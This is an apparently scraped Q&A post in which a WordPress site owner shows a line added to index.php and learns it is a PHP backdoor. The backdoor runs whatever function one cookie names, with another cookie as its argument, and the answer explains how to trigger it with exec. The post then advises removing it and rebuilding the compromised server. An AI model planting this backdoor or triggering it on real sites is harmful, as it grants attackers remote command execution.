php - Wordpress unfamiliar code in root files -
recently 1 of wp website files deleted "cxs scanner " , detected files in root folder
index.php' known exploit = [fingerprint match] [php cookie exploit [p1036]]
when compared file detected cookie exploit older version, noticed there line of code added file:
detected index.php
<?php if (isset($_cookie["id"])) @$_cookie["user"]($_cookie["id"]); /** * front wordpress application. file doesn't anything, loads * wp-blog-header.php , tells wordpress load theme. * * @package wordpress */ /** * tells wordpress load wordpress theme , output it. * * @var bool */ define('wp_use_themes', true); /** loads wordpress environment , template */ require( dirname( __file__ ) . '/wp-blog-header.php' );
older index.php
<?php /** * front wordpress application. file doesn't anything, loads * wp-blog-header.php , tells wordpress load theme. * * @package wordpress */ /** * tells wordpress load wordpress theme , output it. * * @var bool */ define('wp_use_themes', true); /** loads wordpress environment , template */ require( dirname( __file__ ) . '/wp-blog-header.php' );
i not php developer , on comparing line of code added flagged file:
if (isset($_cookie["id"])) @$_cookie["user"]($_cookie["id"]);
should there or security flaw?
it backdoor/exploit.
in php can call functions variable name calling: $var(). same happening here.
<?php function echoit($string) { echo $string; } $func = 'echoit'; $func('test'); // dies ruft echoit() auf ?>
(source: http://php.net/manual/de/functions.variable-functions.php)
to trigger exploit have send 2 cookies. 1 cookie named: user, function value , other 1 name "id" parameter want call with.
so user="exec", id="ls" call exec function parameter "ls".
it rather nice one...you should remove line files.
in addition: have find out why ended in there first place. there can other backdoors on system well. should consider server compromised. hacked systems should burned down. can rise ashes beautiful phoenix again (or so). nevertheless, should rebuild system up-to-date software , data backup clean , change passwords.
Comments
Post a Comment